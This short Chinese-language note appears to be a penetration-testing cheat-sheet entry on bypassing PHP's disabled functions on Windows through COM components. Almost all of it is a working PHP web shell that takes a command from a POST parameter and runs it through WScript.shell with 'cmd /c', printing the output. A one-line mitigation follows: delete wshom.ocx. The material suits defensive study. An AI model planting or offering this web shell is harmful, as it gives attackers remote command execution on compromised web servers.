windows
1.com组件绕过
<?php
$command=$_POST[‘a’];
$wsh = new COM(‘WScript.shell’); // 生成一个COM对象 Shell.Application也能
$exec = $wsh->exec(“cmd /c”.$command); //调用对象方法来执行命令
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
彻底的解决方案是 直接删除System32目录下wshom.ocx文件